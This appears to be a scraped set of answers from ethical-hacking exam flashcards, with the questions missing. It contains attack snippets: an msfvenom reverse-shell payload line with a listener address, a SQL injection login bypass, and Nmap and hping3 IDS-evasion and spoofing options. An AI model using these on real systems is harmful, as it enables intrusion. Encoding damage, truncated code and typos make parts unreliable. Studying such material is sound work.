Fast Track Flashcards

Question

Website mirroring

Answer 1

Copying an entire website to a local drive to view the directory structure, file structure, external links, etc.

Answer 2

An attacker uses the CeWL tool to gather a list of words from the target website and perform a brute-force attack on the email addresses gathered earlier.

Answer 3

a tool to monitor websites, analyze the website's traffic, and track the geographical location of the users visiting the website.

Answer 4

a tool to track the emails of the target and extracts information such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources.

Answer 5

Gathers domain information such as the target domain name, contact details of its owner, expiry date, and creation date

Answer 6

Regional Internet Registry for Europe

Answer 7

An automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP addresses, DNS records, and network Whois records.

Answer 8

An online tool to retrieve information such as the network range of the target organization

Answer 9

Impersonation is a technique whereby an attacker pretends to be a legitimate or authorized person. Attackers perform impersonation attacks personally or use phones or other communication media to mislead targets and trick them into revealing information.

Answer 10

OSINT Framework is an open source intelligence gathering framework that helps security professionals in performing automated footprinting and reconnaissance activities.

Answer 11

Discovers devices hidden by a restrictive firewall

Answer 12

Nmap / Zenmap ICMP Timestamp Ping Scan # nmap ‚-PP

Answer 13

Nmap / Zenmap SYN Ping Scan # nmap ‚-PS

Answer 14

TCP SYN ping scan

Answer 15

Sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed

Answer 16

Does not respond with RST to ACK packet sent to a closed port

Answer 17

Nmap Ack flag probe scanning Attackers send an ACK probe packet with a random sequence number, and no response implies that the port is filtered (stateful firewall is present), whereas an RST response means that the port is not filtered

Answer 18

In Nmap, the -sV option is used to detect type and service versions.

Answer 19

Uses a zombie system with low network activity and ip identification numbers

Answer 20

Using the -sV flag with Nmap

Answer 21

Windows OS TTL

Answer 22

Nmap / Zenmap IP Address Decoy scan The IP address decoy technique refers to generating or manually specifying IP addresses of the decoys to evade IDS/firewalls. #nmap -D RND:10 [target]

Answer 23

Nmap / Zenmap Paranoid Timing Option The paranoid timing option makes the least noise which helps evade IDS #nmap ‚ÄîTO [target]

Answer 24

Uses TTL of 64 and Window size of 5840

Answer 25

Assists in Drawing Network Diagrams Drawing a network diagram helps an attacker to identify the topology or architecture of a target network.

Answer 26

Runs on ports 139 and 445 TCP

Answer 27

Unsecured LDAP port, should change it to 636 - LDAPS

Answer 28

Uses port UDP 161. If you find unencrypted SNMP traffic on your network, change to SNMP V3

Answer 29

NetBIOS code for the messenger service

Answer 30

Contains object types for workstation and server services

Answer 31

Tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, and departmental details.

Answer 32

SMTP provides 3 built-in-commands: VRFY - Validates users EXPN - Shows the actual delivery addresses of aliases and mailing lists RCPT TO - Defines the recipients of a message

Answer 33

DNS cache snooping is a type of DNS enumeration technique in which an attacker queries the DNS server for a specific cached DNS record. By using this cached record, the attacker can determine the sites recently visited by the user.

Answer 34

The File Transfer Protocol (FTP) is used to transfer files over TCP, and its default port is 21.

Answer 35

Can be used to secure an LDAP service against anonymous queries

Answer 36

By default, LDAP traffic is transmitted unsecured (port 389); therefore, use Secure Sockets Layer (SSL) or STARTTLS technology to encrypt the traffic (port 636).

Answer 37

Vulnerabilities found in a tool-based vulnerability assessment that are not true vulnerabiities

Answer 38

(CVSS) v3.0 severity ratings range 4.0-6.9

Answer 39

(CVSS) v3.1 medium severity ratings range

Answer 40

Process of applying fixes on vulnerable systems to reduce the impact and severity of vulnerabilities

Answer 41

The phases involved in vulnerability management are: 1. Identify assets and create a baseline 2. Vulnerability scan 3. Risk assessment 4. Remediation 5. Verification 6. Monitor

Answer 42

Passive assessments sniff the traffic present on the network to identify the active systems, network services, applications, and vulnerabilities. Passive assessments also provide a list of the users who are currently accessing the network.

Answer 43

External assessment examines the network from a hacker‚Äôs point of view to identify exploits and vulnerabilities accessible to the outside world. These types of assessments use external devices such as firewalls, routers, and servers.

Answer 44

Host-based scanners assess systems to identify vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors.

Answer 45

Scans other machines on the network to identify vulnerabilities.

Answer 46

Wireless network assessment determines the vulnerabilities in an organization‚Äôs wireless networks. Many networks still use weak and outdated security mechanisms and are open to attack.

Answer 47

Can identify vulnerabilities in user directories, registries, native configuration tables, incorrect registry or file permissions, and software configuration errors.

Answer 48

After finding services, it selects vulnerabilities on each machine and starts to execute only those relevant tests.

Answer 49

1. Locating nodes 2. Performing service and OS discovery on them 3. Testing those services and OS for known vulnerabilities

Answer 50

May involve infecting a system with malware and using phishing to gain credentials to a system or web application

Answer 51

In this type of attack, a dictionary file is loaded into a cracking application that runs against user accounts. This dictionary is a text file that contains several dictionary words commonly used as passwords. The program uses every word present in the dictionary to find the password.

Answer 52

Steps to perform an internal monologue attack: 1. The attacker disables the security controls of NetNTLMv1 by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLM Traffic. 2. The attacker extracts all the non-network logon tokens from all the active processes to masquerade as legitimate users.

Answer 53

John the Ripper hashcat THC-Hydra Medusa

Answer 54

Extra data is added to a password before hashing to defeat Rainbow tables

Answer 55

LHOST=10.10.10.13 LPORT=4444 -f exe > shell.exe generates reverse TCP shellcode for Windows

Answer 56

char buff[12];

Answer 57

MITRE maintains a CVE database that contains details of the latest vulnerabilities. Attackers can search MITRE CVE to discover vulnerabilities that exist in the target system.

Answer 58

Use Metasploit commands such as getsystem to gain administrative-level privileges and extract password hashes of the admin/user accounts.

Answer 59

The kernel is the core of an OS. A kernel-level rootkit runs in Ring-O with the highest OS privileges. These cover backdoors on the computer and are created by writing additional code, or by substituting portions of kernel code with modified code via device drivers in Windows or loadable kernel modules in Linux.

Answer 60

Maintains a log of typed input

Answer 61

Embedding malicious data into the DNS protocol packets that even DNSSEC cannot detect

Answer 62

Files in UNIX / Linux can be hidden just by appending a dot (.) in front of a file name

Answer 63

Causes annoying pop-ups with advertisements

Answer 64

remains without being detected for a long time and obtains sensitive information without sabotaging the organization.

Answer 65

Initial Intrusion phase of APT lifecycle includes: 1. Deployment of malware 2. Establishment of outbound connection

Answer 66

Attacker attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers

Answer 67

Mirai loT botnet Trojan is still considered as one of the most notorious DDoS attack Trojans

Answer 68

A stealth virus hides from antivirus software by hiding the original size of the file or temporarily placing a copy of itself in some other system drive, thus replacing the infected file with the uninfected file that is stored on the hard drive.

Answer 69

can cipher itself and change its own code

Answer 70

Computer worms are standalone malicious programs that replicate, execute, and spread across network connections independently without human intervention.

Answer 71

AV tools are unable to find

Answer 72

Attackers commonly use social engineering techniques such as phishing to spread fileless malware to the target systems. They send spam emails embedded with malicious links to the victim. When the victim clicks on the link, he/she will be directed to a fraudulent website that automatically loads Flash and triggers the exploit.

Answer 73

A free service that analyzes suspicious files

Answer 74

It is a self-extracting RAR file containing two components. One is the bypass component, and the other is the service component. The bypass component is used for the enumeration of network resources and it either finds writable share drives using the Server Message Block (SMB) or tries to brute-force user accounts, including the administrator account.

Answer 75

A tool to send fake ARP messages over the target network to link a MAC address with the target system's IP address

Answer 76

MAC flooding involves the flooding of the CAM table with fake MAC address and IP pairs until it is full

Answer 77

Attack that leases all the DHCP addresses available in the DHCP scope.

Answer 78

Attacker plugs in a rogue switch with a lower priority than any other switch to make it a root bridge

Answer 79

first step in conducting a DNS cache poisoning

Answer 80

The attacker preteds to be technical support staff of the targeted organization's software vendors or contractors

Answer 81

Attackers target a person inside the company online, pretending to be an attractive person. They then begin a fake online relationship to obtain confidential information about the target company

Answer 82

The attacker may impersonate a technician and gather sensitive information by scanning terminals for passwords, searching for important documents on employees‚Äô desks, rummaging through bins.

Answer 83

Scareware is often seen in pop-ups that tell the target user that their machine has been infected with malware. Further, these pop-up ads always have a sense of urgency and tell the victim to quickly download the software if they want to get rid of the supposed virus.

Answer 84

Redirects to malicious websites by sending a malicious link which appears to be real by email.

Answer 85

The attacker redirects web traffic to a fraudulent website by installing a malicious program on a personal computer or server Can be performed in two ways: DNS Cache Poisoning and Host File Modification

Answer 86

Phishing tool a>

Answer 87

A whaling attack is a type of phishing that targets high profile executives like CEO, CFO, politicians, and celebrities who have complete access to confidential and highly valuable information.

Answer 88

In this type of attack, attackers create fake or spoofed TCP sessions by carrying multiple SYN, ACK, and RST or FIN packets to perform DDOS attacks against target networks, exhausting their network resources.

Answer 89

A DDoS attack. Partial HTTP requests are sent to open multiple connections and slow down the application.

Answer 90

Collects information about a large number of vulnerable machines to create a list, then infects the machines to create a botnet

Answer 91

Implement cognitive radios in the physical layer to handle jamming and scrambling attacks

Answer 92

document.write(');

Answer 93

Attacker obtains a valid session ID and feeds the same session ID to the victim. The session ID links the victim to attacker‚Äôs account page. Victim‚Äôs sensitive payment details entered in a form are linked to attacker‚Äôs account.

Answer 94

Monitoring established traffic between the victim and host to predict ISN, using the ISN to spoof packets sent to the host, hanging the victims connection, and impersonating the victim to communicate with the host.

Answer 95

Burp Suite contains the following key components: An intercepting proxy, which allows the user to inspect and modify traffic between their browser and the target application An intruder tool for performing powerful customized attacks to find and exploit unusual vulnerabilities A sequencer tool for testing the randomness of session tokens

Answer 96

Sends data using encryption and digital certificates

Answer 97

A VPN creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information.

Answer 98

IDS raises an alarm when no attack has taken place

Answer 99

DMZ should always be used when the company has publicly available servers

Answer 100

Webserver should be internet facing, but application and database servers should not.

Answer 101

an appealing isolated environment for hackers

Answer 102

Encoding packets with Unicode characters. IDS cannot recognize the packets, but web server can decode them.

Answer 103

https://proxify.com http://www.guardster.com http://anonymouse.org

Answer 104

Runs on port 53 a>

Answer 105

An attacker can identify the presence of honeyd honeypot by performing time-based TCP fingerprinting methods (SYN proxy behavior).

Answer 106

The file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application

Answer 107

When the user enters a legitimate URL in a browser, the settings will redirect to the attacker‚Äôs fake site. User may be prompted to re-enter credentials as if they have never visited the site before, and the site may not be secure.

Answer 108

dot dot slash (../) character string in a url to navigate to a parent directory on a web server

Answer 109

can be misconfigured to provide verbose error messages

Answer 110

a designer can utilize a URL such as https://xyz.com/feed.php ?url=externalsite.com/feed/t o to obtain a remote feed

Answer 111

a file to discover the structure of a website

Answer 112

By performing web server footprinting, an attacker can gather valuable system-level data such as account details, OS‚Äôs, software versions, server names, and database schema details

Answer 113

Failure would be not applying fixes in a timely fashion. Example: Company is breached several months after a fix is available from the vendor

Answer 114

minimum number of users Helps secure the user accounts on the web server

Answer 115

Syhunt Hybrid crawls websites and detects XSS, directory traversal problems, fault injection, SQL injection, attempts to execute commands, and several other attacks.

Answer 116

Netsparker Burp Suite

Answer 117

Web Services Security (WS-Security) plays an important role in securing web services. It is an extension of SOAP and aims to maintain the integrity and confidentiality of SOAP messages as well as to authenticate users.

Answer 118

Server-side Includes is an application feature that helps designers to auto-generate the content of the web page without manual involvement. Such an application accepts remote user inputs and uses them on the page.

Answer 119

XML External Entity malicious request example:

Answer 120

It is a type of unvalidated redirect attack whereby the attacker first identifies the most visited website of the target, determines the vulnerabilities in the website, injects malicious code into the vulnerable web application, and then waits for the victim to browse the website. Once the victim tries to access the website, the malicious code executes, infecting the victim.

Answer 121

Attacker creates a transparent ‚Äòiframe‚Äô in front of the URL which the victim attempts to click, but actually he/she clicks on the content or URL that exists in the transparent ‚Äòiframe‚Äô which is setup by the attacker.

Answer 122

Attackers perform character by character password examination and exploit the timing information to determine the position where the password comparison failed. Then, attackers use this data to determine the target user‚Äôs password.

Answer 123

Banner grabbing using wget weet -S [target]

Answer 124

Gobuster tool‚Äôs fastest option

Answer 125

When the application specifies which field is incorrect or pops up reasons for denying access, attackers can easily exploit that field by trying a large set of similar names or words to enumerate valid data required to access the application. The list of enumerated data can also be used later for social engineering.

Answer 126

WS-Address provides additional routing information in the SOAP header to support asynchronous communication.

Answer 127

a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application.

Answer 128

User-defined HTTP callback or push APIs that are raised based on trigger events

Answer 129

No proper attribute-based access control (ABAC) validation allows attackers to gain unauthorized access to API objects or perform actions such as viewing, updating, or deleting

Answer 130

Server-side Include Injection Avoid using pages with file name extensions such as .stm, .shtm, and .shtml to prevent attacks.

Answer 131

Vulnerability disclosure program opened by companies

Answer 132

--' and UserPassword = '123456‚Äò SQL command executed by the server when you enter into a login form: Username: attack‚Äô or 1=1-- Password: 123456

Answer 133

In a UNION SQL injection, an attacker combines a forged query with a query requested by the user using a UNION clause. The result of the forged query will be appended the result of the original query, which makes it possible to obtain the values of fields from other tables.

Answer 134

Use the UNION operator to combine the result sets of two or more SELECT statements if they have the same structure

Answer 135

Attacker can steal data by asking a series of true or false questions through SQL statements.

Answer 136

SQL injection attack testing the response time of a true or false response.

Answer 137

SQL injection attack to determine whether the database will return true or false results for user IDs.

Answer 138

May use DNS requests to retrieve information for the attacker

Answer 139

Placing characters such as "' or '1'='1"" in any basic injection statement such as "or 1=1.‚Äù

Answer 140

Whitelist validation is a best practice whereby only the list of entities (i.e., data type, range, size, value, etc.) that have been approved for secured access is accepted.

Answer 141

Was designed to mimic wired encryption.

Answer 142

It is mainly used to deliver password-based authentication using the SAE protocol, also known as Dragonfly Key Exchange, which replaces the PSK concept used in WPA2-Personal. It is resistant to offline dictionary attacks and key recovery attacks.

Answer 143

allows 192-bit minimum-strength security protocols such as GCMP-256, HMAC-SHA384, and ECDSA using a 384-bit elliptic curve.

Answer 144

Adversary tricks a victim into reinstalling an already-in-use key. Associated parameters such as the incremental transmit packet number and receive packet number are reset to their initial values.

Answer 145

Attackers use the Wash command-line utility to identify WPS-enabled APs in the target wireless network.

Answer 146

An evil twin is a wireless AP that pretends to be a legitimate AP by imitating its SSID. Often won't require authentication where the legitimate AP does.

Answer 147

Wireless attack where attacker launches an MITM attack using a fake communication tower intercepting the user data, and redirecting to malicious site.

Answer 148

WPAS3 encryption

Answer 149

To launch this attack, the client and AP should support both WPA3 and WPA2 encryption mechanisms. Here, the attacker forces the user to follow the older encryption method, WPA2, to connect to the network.

Answer 150

Theft of information from a wireless device through Bluetooth

Answer 151

Btlejacking Using BtleJack Start hijacking the connection using the following command: btlejack -f Ox9c68fd30 -t -m Ox 1 fffTTtTTT

Answer 152

To make a wireless network undiscoverable

Answer 153

Attackers drive around with Wi-Fi-enabled laptops installed with a wireless discovery tool to map out open wireless networks.

Answer 154

Legitimate smartphone apps are replaced by deceptive applications that appear legitimate.

Answer 155

A spearphone attack allows Android apps to record loudspeaker data without any privileges.

Answer 156

The attack vector mainly depends on a process called Over-the-Air (OTA) provisioning, which is mainly used by network operators. The attacker exploits the mobile device by sending messages that seem to be genuine from the network operator.

Answer 157

patches the kernel so jailbroken after each successive reboot

Answer 158

Vulnerability that can be exploited by an attacker to read messages and emails by exploiting the ‚ÄúiTunes Wi-Fi Sync‚Äù feature.

Answer 159

Trident is capable of taking complete control of the target mobile device, and it allows attackers to monitor and track all the user activities. It also allows attackers to record audio, capture screenshots, and monitor all phone calls and SMS messages.

Answer 160

Reverse engineering is used to disassemble a software program or a mobile application to analyze its design flaws and fix any bugs that are residing in it.

Answer 161

based on the IEEE 203.15.4 standard (This is a typo in the book and on the exam ‚Äî the actual standard is 802.15.4)

Answer 162

These types of attacks occur when faults or glitches are injected into the power supply that can be used for remote execution, also causing the skipping of key instructions. Faults can also be injected into the clock network used for delivering a synchronized signal across the chip.

Answer 163

1. Attacker targets the specified frequency 2. After obtaining the frequency, the attacker can capture the original data when the commands are initiated by the connected devices 3. Once the original data is collected, the attacker uses free tools such as URH (Universal Radio Hacker) to segregate the command sequence 4. Attacker then injects the segregated command sequence on the same frequency

Answer 164

Helps in finding the details of devices and the certification granted to them.

Answer 165

loTSeeker will scan a network for specific types of loT devices to detect whether they are using the default, factory-set credentials.

Answer 166

Port commonly used by compromised IOT devices to spread malware

Answer 167

Attackers often try to compromise an HMI system as it is the core hub that controls critical infrastructure. If attackers gain access over HMI systems, they can cause physical damage to the SCADA devices (industrial automation components) or collect sensitive information related to the critical architecture that can be used later to perform malicious activities.

Answer 168

Using the above command, attackers can gather information such as the name of the vendor, product code and name, device name, IP address, etc.

Answer 169

Empowers manufacturers and utiity companies to ensure the reliability of their industrial networks confidently to avoid downtime and disruption of service continuity.

Answer 170

Subscriber is responsible for is the management of users. The provider is responsible for the hardware, operating system, and software administration including patching and monitoring.

Answer 171

Infrastructure as a Service requires the subscriber to take the most responsibility of maintenance of resources

Answer 172

A group of users or organizations share a cloud environment

Answer 173

Provides internet connectivity and transport services between the organization and the cloud service provider

Answer 174

A cloud carrier acts as an intermediary that provides connectivity and transport services between CSPs and cloud consumers.

Answer 175

Validates image contents, signs images, and sends them to the registries.

Answer 176

Docker provides a PaaS through OS-level virtualization and delivers containerized software packages. This technology isolates applications from the underlying infrastructure for faster software delivery.

Answer 177

A component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks.

Answer 178

Kube-scheduler is a master component that scans newly generated pods and allocates a node for them. It assigns the nodes based on factors such as the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions.

Answer 179

The difficulties experienced by a user when migrating from in-house systems or from one cloud service provider to another due to the lack of tools, procedures, or standard data formats, poses potential threats to data, application, and service portability

Answer 180

The failure of synchronizing clocks at the end systems can affect the working of automated tasks. For example, if the cloud computing devices do not have synchronized or matched times, then timestamp inaccuracy constitutes the network administrator unable to analyze the log files for any malicious activity accurately.

Answer 181

Attackers initiate spear-phishing emails with custom-made malware to compromise the accounts of staff or cloud service firms to obtain confidential information

Answer 182

Cloudborne is a vulnerability residing in a bare-metal cloud server that enables attackers to implant malicious backdoor in its firmware.

Answer 183

May involve phone calls posing as a legitimate employee or sending phishing emails

Answer 184

The Zero Trust model is a security implementation that by default assumes every user trying to access the network is not a trusted entity and verifies every incoming connection before allowing access to the network.

Answer 185

64-bit blocks, 3 keys, 56 bit keys

Answer 186

Serpent involves 32 rounds of computational operations that include substitution and permutation operations on four 32-bit word blocks using 8-variable S-boxes with 4-bit entry and 4-bit exit. It uses a 128-bit symmetric block cipher with key sizes of 128, 192, or 256 bits.

Answer 187

CAST-128 is a symmetric-key block cipher having: A classical 12-or 16-round Feistel network with a block size of 64 bits. 8x32-bit S-boxes ($1, S2, S3, S4) based on bent functions, modular addition and subtraction, key-dependent rotation, and XOR operations. A masking key (Km1) and a rotation key (Kr1) for performing its functions.

Answer 188

Hardware on a computer's motherboard that generates encryption keys

Answer 189

Encryption algorithm uses 128-bit block size, and key size up to 256 bits

Answer 190

Sender‚Äôs private key signs a message by encrypting the hash (or checksum)

Answer 191

Sender‚Äôs public key verifies (confirms) a message signature

Answer 192

Recipient‚Äôs public key is used to encrypt a message

Answer 193

GNU Privacy Guard (GPG) is a software replacement of PGP and free implementation of the OpenPGP standard that is used to encrypt and decrypt data.

Answer 194

In WOT, every PGP user in the network has a ring of public keys to encrypt the data, and they introduce many other users whom they trust. In this trust model, a user encodes the data with the receiver‚Äôs public key that is decrypted only by the receiver‚Äôs private key.

Answer 195

Bitlocker keys can be stored in, and recovered from Active Directory

Answer 196

In the key stretching technique, the initial key is given as input to an algorithm that generates an enhanced key. The key must be sufficiently resistant to brute-force attacks.

Answer 197

A hash injection/PtH attack allows an attacker to inject a compromised hash into a local session and use the hash to validate network resources.

Answer 198

Duplicate MAC addresses in your ARP table can indicate an ARP spoofing attack

Answer 199

In this query, -u specifies the target URL and --dbs enumerates DBMS databases.

Answer 200

Same private key certificate is used on a different server that allows SSLv2 connections. Which can leak key information

Answer 201

Problem with social media posts that ask personal questions under the guise of getting to know you better

Answer 202

Bettercap is the most suitable tool for conducting a session hijacking attack on a wireless network with WPA-PSK security, due to its advanced capabilities in network analysis and versatility in handling various security protocols.

Answer 203

A Brute Force attack directly leverages the absence of an account lockout policy and the presence of detailed error messages that provide feedback on login attempts.

Answer 204

Raw Sniffing allows for the passive capture of all network traffic, providing a comprehensive view of data flow without actively manipulating network behavior.

Answer 205

A ‚Äòblind‚Äô SQL Injection attack allows for data extraction through true or false responses from the application, effectively circumventing input validation measures that block suspicious patterns.

Answer 206

Error-based SQL Injection takes advantage of the detailed error messages provided by the application to understand the database structure and formulate effective injection queries.

Answer 207

Applying a digital signature mechanism ensures the integrity and authenticity of data upon retrieval, verifying that it hasn't been altered or tampered with since being signed.

Answer 208

Implementing SSL/TLS encryption for data transmission ensures secure and encrypted communication, effectively preventing Man-in-the-Middle attacks from intercepting or manipulating the data.

Answer 209

Data encryption with AES-256 offers a high level of security and performs better than older algorithms like 3DES, while also efficiently balancing security and performance needs in the face of potential quantum computing threats.

Answer 210

Implementing WPA2 or WPA3 encryption is a suitable security measure, as it provides strong protection for the Wi-Fi network and is straightforward to set up and manage, making it ideal for an environment with limited technical knowledge.

Answer 211

Applying asymmetric encryption with RSA and using the private key for signing ensures confidentiality through encryption and non-repudiation by using the private key for digital signing.

Answer 212

Enabling encryption on the wireless network is the most effective first step to mitigate the risk of Wi-Fi eavesdropping, as it secures all data transmitted over the network, making it difficult for unauthorized individuals to intercept and understand the communications.

Answer 213

Implementing WPA3 encryption for the store's Wi-Fi network is the most suitable measure to mitigate the risk of Wardriving attacks, as it provides strong security without affecting the customer experience of accessing in-store Wi-Fi.

Answer 214

Passive reconnaissance techniques such as WHOIS lookups, NS lookups, and web research, allow for the collection of valuable information without sending traffic to the target network, thus avoiding detection by intrusion detection systems.

Answer 215

Using a Cloud Access Security Broker (CASB) is the best solution for achieving unified security management across multiple cloud platforms, as it enables consistent enforcement of security policies, threat monitoring, and visibility into cloud resources.

Answer 216

q=17, T=220: In this scenario, the total delay caused by the attacker ('q*d' = 221 seconds) exceeds the threshold of 200, indicating a high likelihood of triggering a security alert

Answer 217

MAC flooding can overwhelm the switch's memory, a technique that can cause the switch to behave like a hub, thus enabling the attacker to capture packets intended for other hosts in the network.

Answer 218

Employing a tool like Sublist3r, which is designed to enumerate the subdomains of websites using OSINT (Open Source Intelligence), as it specifically targets the discovery of subdomains, making it highly efficient for this particular task.

Answer 219

Displaying a captive portal page that warns users about the possibility of Evil Twin attacks is the most effective and user-friendly measure, as it educates users about the risk without requiring them to install additional software or change their connection habits.

Answer 220

Organize regular employee awareness training regarding social engineering techniques and preventive measures, as this is crucial in educating the workforce about the nature of social engineering attacks, which often exploit human psychology rather than technological vulnerabilities.

Answer 221

Using network segmentation to isolate loMT devices from the main network is the main recommendation, as it limits the potential impact of a breach and reduces the risk of loMT devices being used as entry points for network-wide attacks.

Answer 222

Vulnerability scanning software is limited in its ability to detect vulnerabilities at a given point in time, meaning it might not identify new vulnerabilities that emerge after the scan, which is particularly relevant given the dynamic nature of the network environment described, including legacy applications and outdated systems.

Answer 223

A Cross-Site Scripting (XSS) attack can bypass JavaScript client-side sanitization and exploit the exposure of session cookies not set with the HttpOnly flag

Answer 224

The total number of high, medium, and low-risk vulnerabilities detected throughout the network would NOT be typically included in the detailed documentation for a specific vulnerability, as this information is more relevant to an overall network vulnerability assessment rather than the documentation of a particular vulnerability.

Answer 225

A vulnerability with a base metric score of 7, a temporal metric score of 8, and an environmental metric score of 5, has an overall high severity, the likelihood of exploitability is increasing over time, and it has a medium impact in their specific environment

Answer 226

In a system hacking scenario where passwords are common words with added numbers, a Hybrid Attack, which combines dictionary and brute-force methods, is most likely to succeed.

Answer 227

In a scenario where a malicious Dynamic Link Library (DLL) is loaded in the application directory without a fully qualified path, the likely privilege escalation technique used is DLL Hijacking.

Answer 228

Spoofing In network-level session hijacking, inserting a machine between a client and server to reroute packets is indicative of a Man-in-the-middle Attack Using Forged ICMP and ARP Spoofing.

Answer 229

Using a dedicated network for a smart home system, separate from the home's main Wi-Fi network, effectively isolates devices, enhancing security by ensuring that if one device is compromised, the rest remain secure.

Answer 230

Using the char encoding function to convert hexadecimal and decimal values into characters that pass through SQL engine parsing is an effective SQL Injection evasion technique for bypassing signature-based IDS by altering the query format without changing its logic.

Answer 231

Changing the NTLM password hash used to encrypt a ST will invalidate a stolen Ticket Granting Service ticket and prevent the attacker from using it even if they successfully crack it.

Answer 232

Initiating DNS tunneling to communicate with the command-and-control server allows the adversary to hide malicious traffic within legitimate DNS traffic, making it harder to detect and block.

Answer 233

Requesting a service ticket for the service principal name of the target service account is the next step ina Kerberoasting attack after obtaining a valid user authentication ticket (TGT), allowing the analyst to target specific service accounts for password compromise.

Answer 234

Contact your Internet Service Provider (ISP) for assistance, as they can provide immediate support and implement measures like traffic filtering to mitigate a Distributed Denial of Service (DDoS) attack.

Answer 235

f=490: The server can handle 490 SYN packets per second. With 's' exceeding 'f' by 10, the response time shoots up (210 = 1024 times the usual response time), indicating a system overload.

Answer 236

The 'use_ssl = True‚Äô in the server object creation, is necessary for establishing a secure connection with an LDAP server that only accepts secure connections.

Answer 237

Creating a sophisticated XSS payload that leverages HTML encoding to bypass the input sanitization can be used to redirect users to a malicious site where their cookies can be captured, which circumvents the HTTPOnly flag by redirecting users rather than directly accessing the cookies.

Answer 238

Default settings reveal server software type; change these settings, as attackers can exploit known vulnerabilities of specific software types more easily when the default settings that reveal this information are used.

Answer 239

Conduct regular cybersecurity awareness training, focusing on phishing attacks, as it empowers employees to recognize and avoid such threats while maintaining the autonomy granted by a Bring Your Own Device (BYOD) policy.

Answer 240

Unauthorized users may perform privilege escalation using unnecessarily created accounts, as misconfigurations granting administrative permissions to unknown users can lead to unauthorized access and control over the system.

Answer 241

A Pulse Wave attack sends high-volume traffic pulses at regular intervals and effectively exhausts network resources and is resistant to simple defensive measures like IP-based blocking.

Answer 242

Using client-side encryption and manage encryption keys independently of the CSP ensures that the cloud service provider does not have access to the keys necessary to decrypt the data, thereby securing the data against unauthorized access by the CSP.

Answer 243

Writing YARA rules specifically to identify goodware files triggering false positives would help an IDS differentiate between actual threats and legitimate files, reducing false positives without compromising threat detection.

Answer 244

System crashes and instability due to traffic with packet sizes exceeding the prescribed limit is indicative of a Ping of Death attack, which involves sending malformed or oversized packets to crash the target system.

Answer 245

Implementing network segmentation to separate IloT devices from the rest of the network reduces the risk of a compromised device affecting the entire network and enhances the overall security of the operational technology environment.

Answer 246

Conducting a vulnerability assessment specifically for loT devices will help identify potential security weaknesses in the loT integration, providing a basis for implementing appropriate protective measures.

Answer 247

In Windows Vista or a later version, LM hashes are disabled by default, as these systems no longer store LM hashes to enhance security, result in blank entries for LM hashes in the SAM file.

Answer 248

A Zero Trust model operates on the principle of least privilege, verifying each request as if it is from an untrusted source, regardless of its location, thereby providing stringent access control to the cloud resources and enhancing security.

Answer 249

Attacks exploiting a hardware vulnerability to induce misprediction of instructions and using observable side effects to infer data values describe a Side-Channel Attack, specifically targeting the speculative execution in processors.

Answer 250

Performing regular server configuration audits helps to identify and rectify potential misconfigurations, thereby protecting the web server from attacks that exploit such vulnerabilities.

Answer 251

A mobile app security feature should prevent the app from communicating over a network if it detects a rogue access point, thereby protecting against man-in-the-middle attacks conducted through rogue Wi-Fi hotspots by halting potentially compromised communications.

Answer 252

ARP Ping Scan works within the LAN to discover live hosts, bypassing firewalls that might block other types of pings, like ICMP or TCP.

Answer 253

yarGen generates YARA rules from strings identified in malware files while removing strings that also appear in goodware files, effectively complementing Snort rules in the IDS by enhancing malware detection while minimizing false positives.

Answer 254

Analyzing initial exploitation methods used by an adversary is most crucial for initial analysis, as understanding how they gained entry will help identify vulnerabilities and prevent similar attacks in the future.

Answer 255

Script Kiddies trying to compromise the system using pre-made scripts creates a pattern of automated requests from various locations indicating a lack of advanced skills typically associated with unskilled hackers using readily available tools.

Answer 256

Implementing a brute force attack to verify system vulnerability would not assist in detecting a honeypot, as this method does not specifically identify honeypots but rather attempts to exploit potential vulnerabilities.

Answer 257

Implement 802.1X authentication, as it provides a robust framework for network access control, ensuring that each user is individually authenticated, thereby reducing the risk of unauthorized access due to shared login credentials.

Answer 258

Encrypting data client-side before uploading to the cloud and retaining control of the encryption keys ensures that the client maintains complete control over the encryption process and the keys, complying with their regulatory requirements.

Answer 259

Shoulder surfing is not likely to yield beneficial information based on collected Internet infrastructure details (domains, DNS names, Netblocks, IP address information), as it requires physical proximity and does not directly relate to the digital data gathered.

Answer 260

Enabling WPA2 or WPA3 encryption on the wireless router provides strong security by encrypting data transmitted over the network, ensuring the network is secure from potential attacks.

Answer 261

Unnecessary services could contain vulnerabilities - Always minimize the attack surface, as reducing the number of running services decreases potential entry points for attackers, enhancing the overall security of the web server.

Answer 262

Regularly updating and patching the server software is crucial for security, ensuring that vulnerabilities are addressed promptly and the server is secure from common threats.

Answer 263

Implementing network scanning and monitoring tools can help detect and analyze unauthorized sniffing activities on the network, thereby enhancing the ability to respond to and mitigate these security threats.

Answer 264

Implementing the Diffie-Hellman protocol for secure key exchange allows two parties to securely exchange cryptographic keys over an unsecured communication channel, making it suitable for managing and distributing symmetric keys.

Answer 265

Utilizing a blind injection technique that uses time delays or error signatures to extract information can infer database details when explicit error messages are not available, by observing the behavior of the application to different inputs.

Answer 266

Hping3 uses the '-a' option to spoof the source IP address, enabling the attacker to conduct the scan while maintaining anonymity.

Answer 267

Using Hping3 for an ICMP ping scan, Nmap for a SYN, and Metasploit to exploit identified vulnerabilities, provides a comprehensive approach from discovering live hosts to exploiting vulnerabilities.

Answer 268

Detailed error messages like "Incorrect Syntax near.... ", and "Unclosed quotation mark after the character string...." are examples of Error-based SQL Injection

Answer 269

Conduct for employees on various social engineering methodologies anh risks associated with comprehensive training sessions revealing confidential data, would be successful in preventing an employee from unintentionally divulging information during a phone call.

Answer 270

To confirm a Cross-Site Scripting vulnerability is present, you may utilize a script hosted on the application's domain to test forms‚Äô ability to bypass a Content Security Policy (CSP).

Answer 271

m=90, b=15: The server can manage 90 connections per second, but the attacker's 100 connections exceed this, and with each connection held up for 15 seconds, the attack duration could be significant.

Answer 272

